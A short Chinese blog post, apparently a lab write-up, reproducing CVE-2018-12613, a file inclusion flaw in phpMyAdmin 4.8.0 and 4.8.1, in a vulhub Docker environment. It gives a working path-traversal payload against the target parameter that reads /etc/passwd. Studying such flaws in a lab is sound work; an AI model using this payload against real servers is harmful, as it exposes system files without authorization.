CVE-2018-12613

文件包含:

PHP中提供了四个文件包含的函数,分别是include()、include_once()、require()和require_once()。这四个函数都可以进行文件包含,但作用并不一样。

 

 

 

影响:

版本:phpMyAdmin 4.8.0和4.8.1

复现:

  1. 启动docker
  2. 在vulhub下找到复现的漏洞路径
  3. 启动漏洞靶场

     

  4. 可使用命令cat cat README.md,查看利用方法

  5. 访问:http://127.0.0.1:8080/index.php?

     

  6.  漏洞利用:

    Payload: http://127.0.0.1:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd, 即可读取到passwd中的内容,说明文件包含漏洞存在。

  7. 漏洞利用以后清除靶场环境(复现其他漏洞要清除上一个环境): docker-compose down
posted @ 2020-12-28 16:19  --肆零肆  阅读(151)  评论(0编辑  收藏  举报